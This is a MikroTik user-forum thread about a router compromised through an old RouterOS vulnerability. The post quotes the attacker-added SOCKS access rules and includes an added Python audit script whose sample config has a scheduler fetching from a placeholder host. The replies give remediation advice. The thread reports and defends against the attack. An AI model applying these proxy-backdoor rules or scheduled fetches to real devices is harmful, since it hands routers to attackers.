 
hsabrey
just joined
Topic Author
Posts: 21
Joined: Tue Jul 01, 2014 2:37 pm

ROS v6.43.x Hacked using same old vulnerability

Mon Feb 11, 2019 12:46 pm

Hello,
Today I found my RB2011 has been compromised using the same vulnerability, and here is the photo attached.
This time they fetch a file from the internet, and I do not know what it is.
Meanwhile, the version is v6.43.7.
The script added a file in the MikroTik and this is its content:
/ip socks access add src-address=5.188.0.0/15 action=allow
/ip socks access add src-address=192.243.0.0/16 action=allow
/ip socks access add src-address=5.9.0.0/16 action=allow
/ip socks access add src-address=5.104.0.0/16 action=allow
/ip socks access add src-address=0.0.0.0/0 action=deny
In the attached photo you may see that these SOCKS IPs are added more than 53000 times because the script runs every 15 seconds.
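An added example, not part of the original post: a small Python audit that reads a saved RouterOS configuration dump and reports the indicators described above (SOCKS access rules, how often each is repeated, and schedulers that run at short intervals). The sample input is constructed, and the scheduler names, placeholder URL and 60-second threshold are assumptions.

```python
import re
from collections import Counter

UNITS = {"w": 604800, "d": 86400, "h": 3600, "m": 60, "s": 1}

def interval_seconds(value):
    """Convert a RouterOS interval ('15s', '1m30s', '00:00:15') to seconds."""
    if ":" in value:
        h, m, s = (int(p) for p in value.split(":"))
        return h * 3600 + m * 60 + s
    return sum(int(n) * UNITS[u] for n, u in re.findall(r"(\d+)([wdhms])", value))

def audit(config, max_interval=60):
    """Return findings for SOCKS settings and fast schedulers in a config dump."""
    section, socks, findings = "", Counter(), []
    # Exports wrap long lines with a trailing backslash; join them first.
    for line in re.sub(r"\\\n\s*", "", config).splitlines():
        words = line.split()
        if not words or words[0].startswith("#"):
            continue
        verb_at = next((i for i, w in enumerate(words) if w in ("add", "set")), None)
        if words[0].startswith("/"):  # section header or full-path command
            section = " ".join(words[:verb_at])
        if verb_at is None:
            continue
        params = dict(re.findall(r'([\w-]+)=("[^"]*"|\S+)', " ".join(words[verb_at + 1:])))
        if section == "/ip socks access" and words[verb_at] == "add":
            socks[(params.get("src-address", ""), params.get("action", ""))] += 1
        elif section == "/ip socks" and params.get("enabled") == "yes":
            findings.append("SOCKS proxy enabled")
        elif section == "/system scheduler" and "interval" in params:
            secs = interval_seconds(params["interval"])
            if 0 < secs <= max_interval:
                note = " and calls fetch" if "fetch" in params.get("on-event", "") else ""
                findings.append(f"scheduler {params.get('name', '?')} runs every {secs}s{note}")
    for (src, action), n in socks.items():
        findings.append(f"socks access {action} {src} x{n}")
    return findings

SAMPLE = '''# constructed sample, not taken from a real device
/ip socks
set enabled=yes
/ip socks access add src-address=5.188.0.0/15 action=allow
/ip socks access add src-address=5.188.0.0/15 action=allow
/ip socks access add src-address=0.0.0.0/0 action=deny
/system scheduler
add interval=15s name=example-task on-event="/tool fetch url=http://placeholder.invalid/f"
add interval=1d name=backup on-event="/system backup save"
'''
print("\n".join(audit(SAMPLE)))
```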


 
R1CH
Forum Guru
Posts: 1109
Joined: Sun Oct 01, 2006 11:44 pm

Re: ROS v6.43.x Hacked using same old vulnerability

Mon Feb 11, 2019 1:05 pm

Netinstall the latest version with known clean config and change all passwords. Either you didn't change passwords or you didn't netinstall, so attackers were able to get back onto your device.
 
Redmor
Member Candidate
Posts: 256
Joined: Wed May 31, 2017 7:40 pm
Location: Italy

Re: ROS v6.43.x Hacked using same old vulnerability

Mon Feb 11, 2019 10:44 pm

Destroy RB and buy a new one.